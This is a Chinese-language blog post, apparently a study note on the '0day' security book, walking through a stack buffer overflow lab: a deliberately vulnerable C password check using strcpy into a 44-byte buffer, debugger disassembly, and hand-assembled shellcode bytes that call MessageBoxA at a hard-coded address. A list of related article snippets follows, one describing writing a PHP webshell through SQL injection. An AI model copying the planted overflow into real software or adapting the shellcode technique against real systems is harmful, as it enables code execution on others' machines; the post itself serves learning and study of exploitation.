[0Day]栈溢出原理—— 注入自己的代码

最新推荐文章于 2022-09-04 18:05:21 发布
最新推荐文章于 2022-09-04 18:05:21 发布
阅读量1.3k 收藏
点赞数
分类专栏: Reverse ing
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ls1160/article/details/41594097
版权

这个小部分实验还是花了一点时间的。开始想知道就可以了,先不玩了。后来还是静下心来,把这个玩出来了。跳出msgbox还是很兴奋的,尽管里面啥都木有。

上有漏洞的代码:

 /*
 note:
	//MessageBox(0,"test","helloworld!",MB_OK);
 */
#include <string.h>
#include <stdio.h>
#include <windows.h>
#define PASSWORD "123456"

int authen(char *password)
{
	int aut;
	char buffer[44];//add to be overflowed!!
	aut = strcmp(PASSWORD,password);
	strcpy(buffer, password);//overflow!
	return aut;
}

int main()
{
	LoadLibrary("user32.dll");//prepare for msg
	//MessageBox(0,"This is call overflow by desword!","attention!! I can redirect to any address!",MB_OK);
	char password[1024];
	FILE* fp;
	if(!(fp=fopen("password2.txt","rw+")))//get the pass by read file
		return 0;
	fscanf(fp, "%s", password);
	if( authen(password) )//modify the return address to call msgbox!
	{
		printf("no!  you should try again!\n");
	}
	else
	{
		printf("Yes! you did it! \n");
	}
	fclose(fp);
	getchar();
	getchar();
	return 0;
}

这次的文件中,直接先载入好了windows.h文件,还有user32的文件,方便后面直接调用msgbox的函数。

开始我这样想的,注入代码的话,要获得机器码。那怎么获得勒,可以直接抄书上的。但是我不想,我想,自己写一个msgbox的调用函数,OD直接看。

结果我得到这样的代码:

0040140B   .  C74424 0C 00000000   mov     dword ptr [esp+C], 0                    ; |
00401413   .  C74424 08 78A04100   mov     dword ptr [esp+8], 0041A078             ; |attention!! I can redirect to 

any address!
0040141B   .  C74424 04 A4A04100   mov     dword ptr [esp+4], 0041A0A4             ; |This is call overflow by 

desword!
00401423   .  C70424 00000000      mov     dword ptr [esp], 0                      ; |
0040142A   .  E8 DD170100          call    <jmp.&USER32.MessageBoxA>               ; \MessageBoxA

感觉怪怪的。都是mov,没有push的操作的。= =。 后面我发现了一个致命的问题。机器码中有00的,这个00会被strcpy认为是字符串的终止符,直接停止拷贝的。

就是这个问题,让我后面试了好几次的。不过还是直接改正过来了。想着, 可以自己写汇编代码然后看机器码,不过这里还是偷懒了。直接看书上的,自己改改了。

【这里我总想到,对于一个领域的研究,比如这个漏洞挖掘,或者机器学习算法。  起初应该找自己最能理解的一个角度去实验,这样才会激起兴趣,激起信心,才有可能继续学习下去。现在学习机器算法也是的。我认为,就是应该先抛开那个公式,找一个可以运行的代码,走一遍算法,分一遍类, 看看结果是什么, 再看代码细节,再是数学公式】

最终自己参照着写的代码是这样的。

33DB		xor ebx,ebx
53		push ebx  
8BC4		mov eax,esp
53		push ebx
50		push eax
50		push eax
53		push ebx
b81efdf274	mov eax, 74F2FD1E 
ffd0		call eax
至于megbox的库函数地址,74F2FD1E (直接写一个msg函数,看od汇编得到地址)。 

就是地址与操作系统什么的有关系的。后面会有更加通用的方法来操作的。


函数跳回的位置,应当是自己buffer的位置。


最终构造的漏洞利用文件时这样:


这样,就成功注入了自己的代码,跳出了啥都没有的msgbox了。


今天猛然发现每次重开系统,msgbox的载入位置还会不一样的。= =

7691FD1E USER32.>  8BFF            mov     edi, edi  

于是,将msg的位置改成了7691FD1E 。再次成功。发现依旧需要通用的方法的。


期待后面更加精彩的内容吧!

helloDesword
关注
专栏目录
ch2:栈溢出代码植入
1ame的博客
10-27 660
实验环境: 操作系统 Windows7 IDE VC 6.0 build版本 debug 任务:通过向password.txt中写入二进制机器代码,来调用MessageBoxA,弹出消息框。 用于实验的C语言代码: #include #include #define PASSWORD "1234567" int ver
栈溢出原理
cm_zl
04-28 714
了解栈溢出,首先要了解什么是栈。 栈是一种典型的先进后出( First in Last Out )的数据结构,其操作主要有压栈(push)与出栈(pop)两种操作。
栈溢出 代码植入
Misaka10046的博客
09-15 349
实验代码 #include<stdio.h> #include<windows.h> #define PASSWORD "1234567" int verify_password(char *password) { int authenticated; char buffer[44]; authenticated = strcmp(password,PASSWORD); strcpy(buffer,password);//overflowed return authenti
栈溢出】3.代码注入
weixin_41421812的博客
11-26 3858
1.输入11组4321 buffer[44] 2.查看MessageBoxA入口地址 找到VC++6.0安装路径下的Tools里Depends,运行 拖一个有图形界面的PE文件进去,查看user32.dlll的基地址(0x69E00000)和MessageBoxA的偏移地址(0x000834D0) 计算出MessageBoxA内存中入口地址(0x69E834D0) 出现问题: MessageBox内存地址查找出错,重找: #include<windows.h>
0day安全》堆溢出利用(下)——代码植入
sunr_的博客
08-25 514
0day2》堆溢出利用(下)——代码植入 常用狙击目标(xp sp1前) 与栈溢出中的“地毯式轰炸”不同,堆溢出更加精准,往往直接狙击重要目标。精准是DWORD SHO OT 的优点,但“火力不足”有时也会限制堆溢出的利用,这样就需要选择最重要的目标用来“狙击”。 &emps;1.内存变量:修改能够影响程序执行的重要标志变量,往往可以改变程序流程。(比如改了绕过身份验证) &emps;2.代码逻辑:修改代码段重要函数的关键逻辑有时可以达到一定攻击效果。(例如,程序分支处的判断逻辑,或者把
《挖0day》PDF
08-30
《挖0day》这本书主要探讨的是网络安全领域中的一个重要话题——0day漏洞的挖掘与利用。0day漏洞,顾名思义,是指那些公众或软件开发者尚未知悉的、未被修复的安全漏洞,对于黑客而言,它们是极具价值的攻击工具。在...
php mysql 注入一句话木马_渗透技术--SQL注入写一句话木马原理
weixin_39800387的博客
02-19 2388
讲一下SQL注入中写一句话拿webshell的原理,主要使用的是 SELECT ... INTO OUTFILE 这个语句,下面是一个语句的例子:SELECT * INTO OUTFILE 'C:\log1.txt'这样就可以把查询到的数据写入到C盘的log1.txt这个文件里面。利用这个原理我们可以把PHP的一句话木马写到磁盘上从而拿到webshell。本地的目标站点来实战一下,我们的目的是在目...
XSS漏洞——渗透day08
qq_62716256的博客
09-04 584
XSS漏洞——渗透day08
溢出代码 教你网站溢出漏洞
08-21
溢出代码 教你大神的网络攻防 网站溢出漏洞
0day安全随书代码
08-08
0day安全随书代码,要的来拿0day安全随书代码,要的来拿
0day shellcode编写艺术】—— jmp esp、动态获取api。后续:编码、压缩
desword-- 技术,杂文。
12-11 2770
此次主要徒手体会了一下编写shellcode 的不容易。当真不容易,看着作者的代码,都感觉自己无处可以下手了。 需要的底层原理知识也还挺多需要补充上去的。 打算后期再逐渐补充。目前阶段将jmp esp弄懂了。后面动态获取api在主机上出错了。问题和搜索jmp esp代码时候貌似一样,产生访问越权的问题。后期再继续解决吧。 目前整理一下整个的思路。 1、shellcode、expoit的概念;
0day》-2-栈溢出
Starr
06-26 380
第 2 章 栈溢出 文章目录第 2 章 栈溢出1. 系统栈的工作原理1.1 内存的不同用途1.2 栈与系统栈1.3 函数调用时发生了什么1.4 寄存器与函数栈帧1.5 函数调用约定与相关指令2. 修改邻接变量2.1 修改邻接变量的原理3. 修改函数返回地址4. 代码植入4.1 代码植入的原理 1. 系统栈的工作原理 1.1 内存的不同用途 不管什么样的操作系统、什么样的计算机架构,...
0day安全》之代码植入
qq_36963214的博客
03-02 490
参考 《0day安全》第二版 https://bbs.pediy.com/thread-217164.htm 实验的源码 #include&amp;lt;stdio.h&amp;gt; #include&amp;lt;string.h&amp;gt; #include&amp;lt;windows.h&amp;gt; #define pass &quot;1234567&quot; int verify(char *passwd) {
软件漏洞分析入门_初级栈溢出_植入任意代码(3)
个人笔记
07-08 249
植入任意代码环境工具漏洞程序代码控制流程OD中调试找主函数main技巧验证覆盖buff[44]注意事项找MessageBoxA地址获取机器码方法 环境 VC++6.0 工具 OD Dependency 漏洞程序代码 #include <stdio.h> #include <windows.h> #define PASSWORD "1234567" int verify_password (char *password) { int authenticated;
0day安全实验四】2.4代码植入
diamond_biu的博客
08-29 1194
实验目的 实验二、三中依此展示了淹没相邻变量与返回地址,改变函数流程的方法。本次实验展示——通过栈溢出让进程执行输入数据中植入的代码。 在buffer中包含想要执行代码,通过返回地址让程序跳转到系统栈里执行。 实验内容 编写C程序 #include <stdio.h> #include <string.h> #include <windows.h> #include <stdlib.h> #define PASSWORD "1234567" int veri
栈溢出-pwn
weixin_44642009的博客
03-11 557
打开命名为pwn的可执行文件,将其用IDA静态调试器打开 简易进行相关汇编代码的分析,基本了解栈的结构 按F5对汇编代码进行反汇编,得到源代码 对setvbuf代码进行简单学习,也算是增长新知识,如下: 功 能: 把缓冲区与流相关; 用 法: int setvbuf(FILE *stream, char *buf, int type, unsigned size); 参数:stream:指向流...
栈溢出利用:代码植入与系统栈原理解析
在这篇文章中,主要讨论的是代码植入和栈溢出利用的概念,这些都是0day漏洞挖掘领域的重要内容。栈溢出是由于编程时未正确处理缓冲区大小而导致的安全问题,攻击者可以通过填充过量的数据到缓冲区,使得溢出的数据...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值